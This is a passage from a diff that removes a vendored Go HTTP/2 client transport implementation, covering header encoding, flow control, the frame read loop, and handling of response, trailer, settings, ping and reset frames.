somewhere? - var requestedGzip bool - if !cc.t.disableCompression() && - req.Header.Get("Accept-Encoding") == "" && - req.Header.Get("Range") == "" && - req.Method != "HEAD" { - // Request gzip only, not deflate. Deflate is ambiguous and - // not as universally supported anyway. - // See: http://www.gzip.org/zlib/zlib_faq.html#faq38 - // - // Note that we don't request this for HEAD requests, - // due to a bug in nginx: - // http://trac.nginx.org/nginx/ticket/358 - // https://golang.org/issue/5522 - // - // We don't request gzip if the request is for a range, since - // auto-decoding a portion of a gzipped document will just fail - // anyway. See https://golang.org/issue/8923 - requestedGzip = true - } - - // we send: HEADERS{1}, CONTINUATION{0,} + DATA{0,} (DATA is - // sent by writeRequestBody below, along with any Trailers, - // again in form HEADERS{1}, CONTINUATION{0,}) - hdrs, err := cc.encodeHeaders(req, requestedGzip, trailers, contentLen) - if err != nil { - cc.mu.Unlock() - return nil, err - } - - cs := cc.newStream() - cs.req = req - cs.trace = requestTrace(req) - cs.requestedGzip = requestedGzip - bodyWriter := cc.t.getBodyWriterState(cs, body) - cs.on100 = bodyWriter.on100 - - cc.wmu.Lock() - endStream := !hasBody && !hasTrailers - werr := cc.writeHeaders(cs.ID, endStream, hdrs) - cc.wmu.Unlock() - traceWroteHeaders(cs.trace) - cc.mu.Unlock() - - if werr != nil { - if hasBody { - req.Body.Close() // per RoundTripper contract - bodyWriter.cancel() - } - cc.forgetStreamID(cs.ID) - // Don't bother sending a RST_STREAM (our write already failed; - // no need to keep writing) - traceWroteRequest(cs.trace, werr) - return nil, werr - } - - var respHeaderTimer <-chan time.Time - if hasBody { - bodyWriter.scheduleBodyWrite() - } else { - traceWroteRequest(cs.trace, nil) - if d := cc.responseHeaderTimeout(); d != 0 { - timer := time.NewTimer(d) - defer timer.Stop() - respHeaderTimer = timer.C - } - } - - readLoopResCh := cs.resc - bodyWritten := false - ctx := reqContext(req) - - handleReadLoopResponse := func(re resAndError) (*http.Response, error) { - res := re.res - if re.err != nil || res.StatusCode > 299 { - // On error or status code 3xx, 4xx, 5xx, etc abort any - // ongoing write, assuming that the server doesn't care - // about our request body. If the server replied with 1xx or - // 2xx, however, then assume the server DOES potentially - // want our body (e.g. full-duplex streaming: - // golang.org/issue/13444). If it turns out the server - // doesn't, they'll RST_STREAM us soon enough. This is a - // heuristic to avoid adding knobs to Transport. Hopefully - // we can keep it. - bodyWriter.cancel() - cs.abortRequestBodyWrite(errStopReqBodyWrite) - } - if re.err != nil { - if re.err == errClientConnGotGoAway { - cc.mu.Lock() - if cs.startedWrite { - re.err = errClientConnGotGoAwayAfterSomeReqBody - } - cc.mu.Unlock() - } - cc.forgetStreamID(cs.ID) - return nil, re.err - } - res.Request = req - res.TLS = cc.tlsState - return res, nil - } - - for { - select { - case re := <-readLoopResCh: - return handleReadLoopResponse(re) - case <-respHeaderTimer: - cc.forgetStreamID(cs.ID) - if !hasBody || bodyWritten { - cc.writeStreamReset(cs.ID, ErrCodeCancel, nil) - } else { - bodyWriter.cancel() - cs.abortRequestBodyWrite(errStopReqBodyWriteAndCancel) - } - return nil, errTimeout - case <-ctx.Done(): - cc.forgetStreamID(cs.ID) - if !hasBody || bodyWritten { - cc.writeStreamReset(cs.ID, ErrCodeCancel, nil) - } else { - bodyWriter.cancel() - cs.abortRequestBodyWrite(errStopReqBodyWriteAndCancel) - } - return nil, ctx.Err() - case <-req.Cancel: - cc.forgetStreamID(cs.ID) - if !hasBody || bodyWritten { - cc.writeStreamReset(cs.ID, ErrCodeCancel, nil) - } else { - bodyWriter.cancel() - cs.abortRequestBodyWrite(errStopReqBodyWriteAndCancel) - } - return nil, errRequestCanceled - case <-cs.peerReset: - // processResetStream already removed the - // stream from the streams map; no need for - // forgetStreamID. - return nil, cs.resetErr - case err := <-bodyWriter.resc: - // Prefer the read loop's response, if available. Issue 16102. - select { - case re := <-readLoopResCh: - return handleReadLoopResponse(re) - default: - } - if err != nil { - return nil, err - } - bodyWritten = true - if d := cc.responseHeaderTimeout(); d != 0 { - timer := time.NewTimer(d) - defer timer.Stop() - respHeaderTimer = timer.C - } - } - } -} - -// requires cc.wmu be held -func (cc *ClientConn) writeHeaders(streamID uint32, endStream bool, hdrs []byte) error { - first := true // first frame written (HEADERS is first, then CONTINUATION) - frameSize := int(cc.maxFrameSize) - for len(hdrs) > 0 && cc.werr == nil { - chunk := hdrs - if len(chunk) > frameSize { - chunk = chunk[:frameSize] - } - hdrs = hdrs[len(chunk):] - endHeaders := len(hdrs) == 0 - if first { - cc.fr.WriteHeaders(HeadersFrameParam{ - StreamID: streamID, - BlockFragment: chunk, - EndStream: endStream, - EndHeaders: endHeaders, - }) - first = false - } else { - cc.fr.WriteContinuation(streamID, endHeaders, chunk) - } - } - // TODO(bradfitz): this Flush could potentially block (as - // could the WriteHeaders call(s) above), which means they - // wouldn't respond to Request.Cancel being readable. That's - // rare, but this should probably be in a goroutine. - cc.bw.Flush() - return cc.werr -} - -// internal error values; they don't escape to callers -var ( - // abort request body write; don't send cancel - errStopReqBodyWrite = errors.New("http2: aborting request body write") - - // abort request body write, but send stream reset of cancel. - errStopReqBodyWriteAndCancel = errors.New("http2: canceling request") -) - -func (cs *clientStream) writeRequestBody(body io.Reader, bodyCloser io.Closer) (err error) { - cc := cs.cc - sentEnd := false // whether we sent the final DATA frame w/ END_STREAM - buf := cc.frameScratchBuffer() - defer cc.putFrameScratchBuffer(buf) - - defer func() { - traceWroteRequest(cs.trace, err) - // TODO: write h12Compare test showing whether - // Request.Body is closed by the Transport, - // and in multiple cases: server replies <=299 and >299 - // while still writing request body - cerr := bodyCloser.Close() - if err == nil { - err = cerr - } - }() - - req := cs.req - hasTrailers := req.Trailer != nil - - var sawEOF bool - for !sawEOF { - n, err := body.Read(buf) - if err == io.EOF { - sawEOF = true - err = nil - } else if err != nil { - return err - } - - remain := buf[:n] - for len(remain) > 0 && err == nil { - var allowed int32 - allowed, err = cs.awaitFlowControl(len(remain)) - switch { - case err == errStopReqBodyWrite: - return err - case err == errStopReqBodyWriteAndCancel: - cc.writeStreamReset(cs.ID, ErrCodeCancel, nil) - return err - case err != nil: - return err - } - cc.wmu.Lock() - data := remain[:allowed] - remain = remain[allowed:] - sentEnd = sawEOF && len(remain) == 0 && !hasTrailers - err = cc.fr.WriteData(cs.ID, sentEnd, data) - if err == nil { - // TODO(bradfitz): this flush is for latency, not bandwidth. - // Most requests won't need this. Make this opt-in or - // opt-out? Use some heuristic on the body type? Nagel-like - // timers? Based on 'n'? Only last chunk of this for loop, - // unless flow control tokens are low? For now, always. - // If we change this, see comment below. - err = cc.bw.Flush() - } - cc.wmu.Unlock() - } - if err != nil { - return err - } - } - - if sentEnd { - // Already sent END_STREAM (which implies we have no - // trailers) and flushed, because currently all - // WriteData frames above get a flush. So we're done. - return nil - } - - var trls []byte - if hasTrailers { - cc.mu.Lock() - defer cc.mu.Unlock() - trls = cc.encodeTrailers(req) - } - - cc.wmu.Lock() - defer cc.wmu.Unlock() - - // Two ways to send END_STREAM: either with trailers, or - // with an empty DATA frame. - if len(trls) > 0 { - err = cc.writeHeaders(cs.ID, true, trls) - } else { - err = cc.fr.WriteData(cs.ID, true, nil) - } - if ferr := cc.bw.Flush(); ferr != nil && err == nil { - err = ferr - } - return err -} - -// awaitFlowControl waits for [1, min(maxBytes, cc.cs.maxFrameSize)] flow -// control tokens from the server. -// It returns either the non-zero number of tokens taken or an error -// if the stream is dead. -func (cs *clientStream) awaitFlowControl(maxBytes int) (taken int32, err error) { - cc := cs.cc - cc.mu.Lock() - defer cc.mu.Unlock() - for { - if cc.closed { - return 0, errClientConnClosed - } - if cs.stopReqBody != nil { - return 0, cs.stopReqBody - } - if err := cs.checkResetOrDone(); err != nil { - return 0, err - } - if a := cs.flow.available(); a > 0 { - take := a - if int(take) > maxBytes { - - take = int32(maxBytes) // can't truncate int; take is int32 - } - if take > int32(cc.maxFrameSize) { - take = int32(cc.maxFrameSize) - } - cs.flow.take(take) - return take, nil - } - cc.cond.Wait() - } -} - -type badStringError struct { - what string - str string -} - -func (e *badStringError) Error() string { return fmt.Sprintf("%s %q", e.what, e.str) } - -// requires cc.mu be held. -func (cc *ClientConn) encodeHeaders(req *http.Request, addGzipHeader bool, trailers string, contentLength int64) ([]byte, error) { - cc.hbuf.Reset() - - host := req.Host - if host == "" { - host = req.URL.Host - } - host, err := httplex.PunycodeHostPort(host) - if err != nil { - return nil, err - } - - var path string - if req.Method != "CONNECT" { - path = req.URL.RequestURI() - if !validPseudoPath(path) { - orig := path - path = strings.TrimPrefix(path, req.URL.Scheme+"://"+host) - if !validPseudoPath(path) { - if req.URL.Opaque != "" { - return nil, fmt.Errorf("invalid request :path %q from URL.Opaque = %q", orig, req.URL.Opaque) - } else { - return nil, fmt.Errorf("invalid request :path %q", orig) - } - } - } - } - - // Check for any invalid headers and return an error before we - // potentially pollute our hpack state. (We want to be able to - // continue to reuse the hpack encoder for future requests) - for k, vv := range req.Header { - if !httplex.ValidHeaderFieldName(k) { - return nil, fmt.Errorf("invalid HTTP header name %q", k) - } - for _, v := range vv { - if !httplex.ValidHeaderFieldValue(v) { - return nil, fmt.Errorf("invalid HTTP header value %q for header %q", v, k) - } - } - } - - // 8.1.2.3 Request Pseudo-Header Fields - // The :path pseudo-header field includes the path and query parts of the - // target URI (the path-absolute production and optionally a '?' character - // followed by the query production (see Sections 3.3 and 3.4 of - // [RFC3986]). - cc.writeHeader(":authority", host) - cc.writeHeader(":method", req.Method) - if req.Method != "CONNECT" { - cc.writeHeader(":path", path) - cc.writeHeader(":scheme", req.URL.Scheme) - } - if trailers != "" { - cc.writeHeader("trailer", trailers) - } - - var didUA bool - for k, vv := range req.Header { - lowKey := strings.ToLower(k) - switch lowKey { - case "host", "content-length": - // Host is :authority, already sent. - // Content-Length is automatic, set below. - continue - case "connection", "proxy-connection", "transfer-encoding", "upgrade", "keep-alive": - // Per 8.1.2.2 Connection-Specific Header - // Fields, don't send connection-specific - // fields. We have already checked if any - // are error-worthy so just ignore the rest. - continue - case "user-agent": - // Match Go's http1 behavior: at most one - // User-Agent. If set to nil or empty string, - // then omit it. Otherwise if not mentioned, - // include the default (below). - didUA = true - if len(vv) < 1 { - continue - } - vv = vv[:1] - if vv[0] == "" { - continue - } - } - for _, v := range vv { - cc.writeHeader(lowKey, v) - } - } - if shouldSendReqContentLength(req.Method, contentLength) { - cc.writeHeader("content-length", strconv.FormatInt(contentLength, 10)) - } - if addGzipHeader { - cc.writeHeader("accept-encoding", "gzip") - } - if !didUA { - cc.writeHeader("user-agent", defaultUserAgent) - } - return cc.hbuf.Bytes(), nil -} - -// shouldSendReqContentLength reports whether the http2.Transport should send -// a "content-length" request header. This logic is basically a copy of the net/http -// transferWriter.shouldSendContentLength. -// The contentLength is the corrected contentLength (so 0 means actually 0, not unknown). -// -1 means unknown. -func shouldSendReqContentLength(method string, contentLength int64) bool { - if contentLength > 0 { - return true - } - if contentLength < 0 { - return false - } - // For zero bodies, whether we send a content-length depends on the method. - // It also kinda doesn't matter for http2 either way, with END_STREAM. - switch method { - case "POST", "PUT", "PATCH": - return true - default: - return false - } -} - -// requires cc.mu be held. -func (cc *ClientConn) encodeTrailers(req *http.Request) []byte { - cc.hbuf.Reset() - for k, vv := range req.Trailer { - // Transfer-Encoding, etc.. have already been filter at the - // start of RoundTrip - lowKey := strings.ToLower(k) - for _, v := range vv { - cc.writeHeader(lowKey, v) - } - } - return cc.hbuf.Bytes() -} - -func (cc *ClientConn) writeHeader(name, value string) { - if VerboseLogs { - log.Printf("http2: Transport encoding header %q = %q", name, value) - } - cc.henc.WriteField(hpack.HeaderField{Name: name, Value: value}) -} - -type resAndError struct { - res *http.Response - err error -} - -// requires cc.mu be held. -func (cc *ClientConn) newStream() *clientStream { - cs := &clientStream{ - cc: cc, - ID: cc.nextStreamID, - resc: make(chan resAndError, 1), - peerReset: make(chan struct{}), - done: make(chan struct{}), - } - cs.flow.add(int32(cc.initialWindowSize)) - cs.flow.setConnFlow(&cc.flow) - cs.inflow.add(transportDefaultStreamFlow) - cs.inflow.setConnFlow(&cc.inflow) - cc.nextStreamID += 2 - cc.streams[cs.ID] = cs - return cs -} - -func (cc *ClientConn) forgetStreamID(id uint32) { - cc.streamByID(id, true) -} - -func (cc *ClientConn) streamByID(id uint32, andRemove bool) *clientStream { - cc.mu.Lock() - defer cc.mu.Unlock() - cs := cc.streams[id] - if andRemove && cs != nil && !cc.closed { - cc.lastActive = time.Now() - delete(cc.streams, id) - if len(cc.streams) == 0 && cc.idleTimer != nil { - cc.idleTimer.Reset(cc.idleTimeout) - } - close(cs.done) - cc.cond.Broadcast() // wake up checkResetOrDone via clientStream.awaitFlowControl - } - return cs -} - -// clientConnReadLoop is the state owned by the clientConn's frame-reading readLoop. -type clientConnReadLoop struct { - cc *ClientConn - activeRes map[uint32]*clientStream // keyed by streamID - closeWhenIdle bool -} - -// readLoop runs in its own goroutine and reads and dispatches frames. -func (cc *ClientConn) readLoop() { - rl := &clientConnReadLoop{ - cc: cc, - activeRes: make(map[uint32]*clientStream), - } - - defer rl.cleanup() - cc.readerErr = rl.run() - if ce, ok := cc.readerErr.(ConnectionError); ok { - cc.wmu.Lock() - cc.fr.WriteGoAway(0, ErrCode(ce), nil) - cc.wmu.Unlock() - } -} - -// GoAwayError is returned by the Transport when the server closes the -// TCP connection after sending a GOAWAY frame. -type GoAwayError struct { - LastStreamID uint32 - ErrCode ErrCode - DebugData string -} - -func (e GoAwayError) Error() string { - return fmt.Sprintf("http2: server sent GOAWAY and closed the connection; LastStreamID=%v, ErrCode=%v, debug=%q", - e.LastStreamID, e.ErrCode, e.DebugData) -} - -func isEOFOrNetReadError(err error) bool { - if err == io.EOF { - return true - } - ne, ok := err.(*net.OpError) - return ok && ne.Op == "read" -} - -func (rl *clientConnReadLoop) cleanup() { - cc := rl.cc - defer cc.tconn.Close() - defer cc.t.connPool().MarkDead(cc) - defer close(cc.readerDone) - - if cc.idleTimer != nil { - cc.idleTimer.Stop() - } - - // Close any response bodies if the server closes prematurely. - // TODO: also do this if we've written the headers but not - // gotten a response yet. - err := cc.readerErr - cc.mu.Lock() - if cc.goAway != nil && isEOFOrNetReadError(err) { - err = GoAwayError{ - LastStreamID: cc.goAway.LastStreamID, - ErrCode: cc.goAway.ErrCode, - DebugData: cc.goAwayDebug, - } - } else if err == io.EOF { - err = io.ErrUnexpectedEOF - } - for _, cs := range rl.activeRes { - cs.bufPipe.CloseWithError(err) - } - for _, cs := range cc.streams { - select { - case cs.resc <- resAndError{err: err}: - default: - } - close(cs.done) - } - cc.closed = true - cc.cond.Broadcast() - cc.mu.Unlock() -} - -func (rl *clientConnReadLoop) run() error { - cc := rl.cc - rl.closeWhenIdle = cc.t.disableKeepAlives() || cc.singleUse - gotReply := false // ever saw a HEADERS reply - gotSettings := false - for { - f, err := cc.fr.ReadFrame() - if err != nil { - cc.vlogf("http2: Transport readFrame error on conn %p: (%T) %v", cc, err, err) - } - if se, ok := err.(StreamError); ok { - if cs := cc.streamByID(se.StreamID, true /*ended; remove it*/); cs != nil { - cs.cc.writeStreamReset(cs.ID, se.Code, err) - if se.Cause == nil { - se.Cause = cc.fr.errDetail - } - rl.endStreamError(cs, se) - } - continue - } else if err != nil { - return err - } - if VerboseLogs { - cc.vlogf("http2: Transport received %s", summarizeFrame(f)) - } - if !gotSettings { - if _, ok := f.(*SettingsFrame); !ok { - cc.logf("protocol error: received %T before a SETTINGS frame", f) - return ConnectionError(ErrCodeProtocol) - } - gotSettings = true - } - maybeIdle := false // whether frame might transition us to idle - - switch f := f.(type) { - case *MetaHeadersFrame: - err = rl.processHeaders(f) - maybeIdle = true - gotReply = true - case *DataFrame: - err = rl.processData(f) - maybeIdle = true - case *GoAwayFrame: - err = rl.processGoAway(f) - maybeIdle = true - case *RSTStreamFrame: - err = rl.processResetStream(f) - maybeIdle = true - case *SettingsFrame: - err = rl.processSettings(f) - case *PushPromiseFrame: - err = rl.processPushPromise(f) - case *WindowUpdateFrame: - err = rl.processWindowUpdate(f) - case *PingFrame: - err = rl.processPing(f) - default: - cc.logf("Transport: unhandled response frame type %T", f) - } - if err != nil { - if VerboseLogs { - cc.vlogf("http2: Transport conn %p received error from processing frame %v: %v", cc, summarizeFrame(f), err) - } - return err - } - if rl.closeWhenIdle && gotReply && maybeIdle && len(rl.activeRes) == 0 { - cc.closeIfIdle() - } - } -} - -func (rl *clientConnReadLoop) processHeaders(f *MetaHeadersFrame) error { - cc := rl.cc - cs := cc.streamByID(f.StreamID, f.StreamEnded()) - if cs == nil { - // We'd get here if we canceled a request while the - // server had its response still in flight. So if this - // was just something we canceled, ignore it. - return nil - } - if !cs.firstByte { - if cs.trace != nil { - // TODO(bradfitz): move first response byte earlier, - // when we first read the 9 byte header, not waiting - // until all the HEADERS+CONTINUATION frames have been - // merged. This works for now. - traceFirstResponseByte(cs.trace) - } - cs.firstByte = true - } - if !cs.pastHeaders { - cs.pastHeaders = true - } else { - return rl.processTrailers(cs, f) - } - - res, err := rl.handleResponse(cs, f) - if err != nil { - if _, ok := err.(ConnectionError); ok { - return err - } - // Any other error type is a stream error. - cs.cc.writeStreamReset(f.StreamID, ErrCodeProtocol, err) - cs.resc <- resAndError{err: err} - return nil // return nil from process* funcs to keep conn alive - } - if res == nil { - // (nil, nil) special case. See handleResponse docs. - return nil - } - if res.Body != noBody { - rl.activeRes[cs.ID] = cs - } - cs.resTrailer = &res.Trailer - cs.resc <- resAndError{res: res} - return nil -} - -// may return error types nil, or ConnectionError. Any other error value -// is a StreamError of type ErrCodeProtocol. The returned error in that case -// is the detail. -// -// As a special case, handleResponse may return (nil, nil) to skip the -// frame (currently only used for 100 expect continue). This special -// case is going away after Issue 13851 is fixed. -func (rl *clientConnReadLoop) handleResponse(cs *clientStream, f *MetaHeadersFrame) (*http.Response, error) { - if f.Truncated { - return nil, errResponseHeaderListSize - } - - status := f.PseudoValue("status") - if status == "" { - return nil, errors.New("missing status pseudo header") - } - statusCode, err := strconv.Atoi(status) - if err != nil { - return nil, errors.New("malformed non-numeric status pseudo header") - } - - if statusCode == 100 { - traceGot100Continue(cs.trace) - if cs.on100 != nil { - cs.on100() // forces any write delay timer to fire - } - cs.pastHeaders = false // do it all again - return nil, nil - } - - header := make(http.Header) - res := &http.Response{ - Proto: "HTTP/2.0", - ProtoMajor: 2, - Header: header, - StatusCode: statusCode, - Status: status + " " + http.StatusText(statusCode), - } - for _, hf := range f.RegularFields() { - key := http.CanonicalHeaderKey(hf.Name) - if key == "Trailer" { - t := res.Trailer - if t == nil { - t = make(http.Header) - res.Trailer = t - } - foreachHeaderElement(hf.Value, func(v string) { - t[http.CanonicalHeaderKey(v)] = nil - }) - } else { - header[key] = append(header[key], hf.Value) - } - } - - streamEnded := f.StreamEnded() - isHead := cs.req.Method == "HEAD" - if !streamEnded || isHead { - res.ContentLength = -1 - if clens := res.Header["Content-Length"]; len(clens) == 1 { - if clen64, err := strconv.ParseInt(clens[0], 10, 64); err == nil { - res.ContentLength = clen64 - } else { - // TODO: care? unlike http/1, it won't mess up our framing, so it's - // more safe smuggling-wise to ignore. - } - } else if len(clens) > 1 { - // TODO: care? unlike http/1, it won't mess up our framing, so it's - // more safe smuggling-wise to ignore. - } - } - - if streamEnded || isHead { - res.Body = noBody - return res, nil - } - - cs.bufPipe = pipe{b: &dataBuffer{expected: res.ContentLength}} - cs.bytesRemain = res.ContentLength - res.Body = transportResponseBody{cs} - go cs.awaitRequestCancel(cs.req) - - if cs.requestedGzip && res.Header.Get("Content-Encoding") == "gzip" { - res.Header.Del("Content-Encoding") - res.Header.Del("Content-Length") - res.ContentLength = -1 - res.Body = &gzipReader{body: res.Body} - setResponseUncompressed(res) - } - return res, nil -} - -func (rl *clientConnReadLoop) processTrailers(cs *clientStream, f *MetaHeadersFrame) error { - if cs.pastTrailers { - // Too many HEADERS frames for this stream. - return ConnectionError(ErrCodeProtocol) - } - cs.pastTrailers = true - if !f.StreamEnded() { - // We expect that any headers for trailers also - // has END_STREAM. - return ConnectionError(ErrCodeProtocol) - } - if len(f.PseudoFields()) > 0 { - // No pseudo header fields are defined for trailers. - // TODO: ConnectionError might be overly harsh? Check. - return ConnectionError(ErrCodeProtocol) - } - - trailer := make(http.Header) - for _, hf := range f.RegularFields() { - key := http.CanonicalHeaderKey(hf.Name) - trailer[key] = append(trailer[key], hf.Value) - } - cs.trailer = trailer - - rl.endStream(cs) - return nil -} - -// transportResponseBody is the concrete type of Transport.RoundTrip's -// Response.Body. It is an io.ReadCloser. On Read, it reads from cs.body. -// On Close it sends RST_STREAM if EOF wasn't already seen. -type transportResponseBody struct { - cs *clientStream -} - -func (b transportResponseBody) Read(p []byte) (n int, err error) { - cs := b.cs - cc := cs.cc - - if cs.readErr != nil { - return 0, cs.readErr - } - n, err = b.cs.bufPipe.Read(p) - if cs.bytesRemain != -1 { - if int64(n) > cs.bytesRemain { - n = int(cs.bytesRemain) - if err == nil { - err = errors.New("net/http: server replied with more than declared Content-Length; truncated") - cc.writeStreamReset(cs.ID, ErrCodeProtocol, err) - } - cs.readErr = err - return int(cs.bytesRemain), err - } - cs.bytesRemain -= int64(n) - if err == io.EOF && cs.bytesRemain > 0 { - err = io.ErrUnexpectedEOF - cs.readErr = err - return n, err - } - } - if n == 0 { - // No flow control tokens to send back. - return - } - - cc.mu.Lock() - defer cc.mu.Unlock() - - var connAdd, streamAdd int32 - // Check the conn-level first, before the stream-level. - if v := cc.inflow.available(); v < transportDefaultConnFlow/2 { - connAdd = transportDefaultConnFlow - v - cc.inflow.add(connAdd) - } - if err == nil { // No need to refresh if the stream is over or failed. - // Consider any buffered body data (read from the conn but not - // consumed by the client) when computing flow control for this - // stream. - v := int(cs.inflow.available()) + cs.bufPipe.Len() - if v < transportDefaultStreamFlow-transportDefaultStreamMinRefresh { - streamAdd = int32(transportDefaultStreamFlow - v) - cs.inflow.add(streamAdd) - } - } - if connAdd != 0 || streamAdd != 0 { - cc.wmu.Lock() - defer cc.wmu.Unlock() - if connAdd != 0 { - cc.fr.WriteWindowUpdate(0, mustUint31(connAdd)) - } - if streamAdd != 0 { - cc.fr.WriteWindowUpdate(cs.ID, mustUint31(streamAdd)) - } - cc.bw.Flush() - } - return -} - -var errClosedResponseBody = errors.New("http2: response body closed") - -func (b transportResponseBody) Close() error { - cs := b.cs - cc := cs.cc - - serverSentStreamEnd := cs.bufPipe.Err() == io.EOF - unread := cs.bufPipe.Len() - - if unread > 0 || !serverSentStreamEnd { - cc.mu.Lock() - cc.wmu.Lock() - if !serverSentStreamEnd { - cc.fr.WriteRSTStream(cs.ID, ErrCodeCancel) - cs.didReset = true - } - // Return connection-level flow control. - if unread > 0 { - cc.inflow.add(int32(unread)) - cc.fr.WriteWindowUpdate(0, uint32(unread)) - } - cc.bw.Flush() - cc.wmu.Unlock() - cc.mu.Unlock() - } - - cs.bufPipe.BreakWithError(errClosedResponseBody) - return nil -} - -func (rl *clientConnReadLoop) processData(f *DataFrame) error { - cc := rl.cc - cs := cc.streamByID(f.StreamID, f.StreamEnded()) - data := f.Data() - if cs == nil { - cc.mu.Lock() - neverSent := cc.nextStreamID - cc.mu.Unlock() - if f.StreamID >= neverSent { - // We never asked for this. - cc.logf("http2: Transport received unsolicited DATA frame; closing connection") - return ConnectionError(ErrCodeProtocol) - } - // We probably did ask for this, but canceled. Just ignore it. - // TODO: be stricter here? only silently ignore things which - // we canceled, but not things which were closed normally - // by the peer? Tough without accumulating too much state. - - // But at least return their flow control: - if f.Length > 0 { - cc.mu.Lock() - cc.inflow.add(int32(f.Length)) - cc.mu.Unlock() - - cc.wmu.Lock() - cc.fr.WriteWindowUpdate(0, uint32(f.Length)) - cc.bw.Flush() - cc.wmu.Unlock() - } - return nil - } - if f.Length > 0 { - // Check connection-level flow control. - cc.mu.Lock() - if cs.inflow.available() >= int32(f.Length) { - cs.inflow.take(int32(f.Length)) - } else { - cc.mu.Unlock() - return ConnectionError(ErrCodeFlowControl) - } - // Return any padded flow control now, since we won't - // refund it later on body reads. - var refund int - if pad := int(f.Length) - len(data); pad > 0 { - refund += pad - } - // Return len(data) now if the stream is already closed, - // since data will never be read. - didReset := cs.didReset - if didReset { - refund += len(data) - } - if refund > 0 { - cc.inflow.add(int32(refund)) - cc.wmu.Lock() - cc.fr.WriteWindowUpdate(0, uint32(refund)) - if !didReset { - cs.inflow.add(int32(refund)) - cc.fr.WriteWindowUpdate(cs.ID, uint32(refund)) - } - cc.bw.Flush() - cc.wmu.Unlock() - } - cc.mu.Unlock() - - if len(data) > 0 && !didReset { - if _, err := cs.bufPipe.Write(data); err != nil { - rl.endStreamError(cs, err) - return err - } - } - } - - if f.StreamEnded() { - rl.endStream(cs) - } - return nil -} - -var errInvalidTrailers = errors.New("http2: invalid trailers") - -func (rl *clientConnReadLoop) endStream(cs *clientStream) { - // TODO: check that any declared content-length matches, like - // server.go's (*stream).endStream method. - rl.endStreamError(cs, nil) -} - -func (rl *clientConnReadLoop) endStreamError(cs *clientStream, err error) { - var code func() - if err == nil { - err = io.EOF - code = cs.copyTrailers - } - cs.bufPipe.closeWithErrorAndCode(err, code) - delete(rl.activeRes, cs.ID) - if isConnectionCloseRequest(cs.req) { - rl.closeWhenIdle = true - } - - select { - case cs.resc <- resAndError{err: err}: - default: - } -} - -func (cs *clientStream) copyTrailers() { - for k, vv := range cs.trailer { - t := cs.resTrailer - if *t == nil { - *t = make(http.Header) - } - (*t)[k] = vv - } -} - -func (rl *clientConnReadLoop) processGoAway(f *GoAwayFrame) error { - cc := rl.cc - cc.t.connPool().MarkDead(cc) - if f.ErrCode != 0 { - // TODO: deal with GOAWAY more. particularly the error code - cc.vlogf("transport got GOAWAY with error code = %v", f.ErrCode) - } - cc.setGoAway(f) - return nil -} - -func (rl *clientConnReadLoop) processSettings(f *SettingsFrame) error { - cc := rl.cc - cc.mu.Lock() - defer cc.mu.Unlock() - - if f.IsAck() { - if cc.wantSettingsAck { - cc.wantSettingsAck = false - return nil - } - return ConnectionError(ErrCodeProtocol) - } - - err := f.ForeachSetting(func(s Setting) error { - switch s.ID { - case SettingMaxFrameSize: - cc.maxFrameSize = s.Val - case SettingMaxConcurrentStreams: - cc.maxConcurrentStreams = s.Val - case SettingInitialWindowSize: - // Values above the maximum flow-control - // window size of 2^31-1 MUST be treated as a - // connection error (Section 5.4.1) of type - // FLOW_CONTROL_ERROR. - if s.Val > math.MaxInt32 { - return ConnectionError(ErrCodeFlowControl) - } - - // Adjust flow control of currently-open - // frames by the difference of the old initial - // window size and this one. - delta := int32(s.Val) - int32(cc.initialWindowSize) - for _, cs := range cc.streams { - cs.flow.add(delta) - } - cc.cond.Broadcast() - - cc.initialWindowSize = s.Val - default: - // TODO(bradfitz): handle more settings? SETTINGS_HEADER_TABLE_SIZE probably. - cc.vlogf("Unhandled Setting: %v", s) - } - return nil - }) - if err != nil { - return err - } - - cc.wmu.Lock() - defer cc.wmu.Unlock() - - cc.fr.WriteSettingsAck() - cc.bw.Flush() - return cc.werr -} - -func (rl *clientConnReadLoop) processWindowUpdate(f *WindowUpdateFrame) error { - cc := rl.cc - cs := cc.streamByID(f.StreamID, false) - if f.StreamID != 0 && cs == nil { - return nil - } - - cc.mu.Lock() - defer cc.mu.Unlock() - - fl := &cc.flow - if cs != nil { - fl = &cs.flow - } - if !fl.add(int32(f.Increment)) { - return ConnectionError(ErrCodeFlowControl) - } - cc.cond.Broadcast() - return nil -} - -func (rl *clientConnReadLoop) processResetStream(f *RSTStreamFrame) error { - cs := rl.cc.streamByID(f.StreamID, true) - if cs == nil { - // TODO: return error if server tries to RST_STEAM an idle stream - return nil - } - select { - case <-cs.peerReset: - // Already reset. - // This is the only goroutine - // which closes this, so there - // isn't a race. - default: - err := streamError(cs.ID, f.ErrCode) - cs.resetErr = err - close(cs.peerReset) - cs.bufPipe.CloseWithError(err) - cs.cc.cond.Broadcast() // wake up checkResetOrDone via clientStream.awaitFlowControl - } - delete(rl.activeRes, cs.ID) - return nil -} - -// Ping sends a PING frame to the server and waits for the ack. -// Public implementation is in go17.go and not_go17.go -func (cc *ClientConn) ping(ctx contextContext) error { - c := make(chan struct{}) - // Generate a random payload - var p [8]byte - for { - if _, err := rand.Read(p[:]); err != nil { - return err - } - cc.mu.Lock() - // check for dup before insert - if _, found := cc.pings[p]; !found { - cc.pings[p] = c - cc.mu.Unlock() - break - } - cc.mu.Unlock() - } - cc.wmu.Lock() - if err := cc.fr.WritePing(false, p); err != nil { - cc.wmu.Unlock() - return err - } - if err := cc.bw.Flush(); err != nil { - cc.wmu.Unlock() - return err - } - cc.wmu.Unlock() - select { - case <-c: - return nil - case <-ctx.Done(): - return ctx.Err() - case <-cc.readerDone: - // connection closed - return cc.readerErr - } -} - -func (rl *clientConnReadLoop) processPing(f *PingFrame) error { - if f.IsAck() { - cc := rl.cc - cc.mu.Lock() - defer cc.mu.Unlock() - // If ack, notify listener if any - if c, ok := cc.pings[f.Data]; ok { - close(c) - delete(cc.pings, f.Data) - } - return nil - } - cc := rl.cc - cc.wmu.Lock() - defer cc.wmu.Unlock() - if err := cc.fr.WritePing(true, f.Data); err != nil { - return err - } - return cc.bw.Flush() -} - -func (rl *clientConnReadLoop) processPushPromise(f *PushPromiseFrame) error { - // We told the peer we don't want them. - // Spec says: - // "PUSH_PROMISE MUST NOT be sent if the SETTINGS_ENABLE_PUSH - // setting of the peer endpoint is set to 0. An endpoint that - // has set this setting and has received acknowledgement MUST - // treat the receipt of a PUSH_PROMISE frame as a connection - // error (Section 5.4.1) of type PROTOCOL_ERROR." - return ConnectionError(ErrCodeProtocol) -} - -func (cc *ClientConn) writeStreamReset(streamID uint32, code ErrCode, err error) { - // TODO: map err to more interesting error codes, once the - // HTTP community 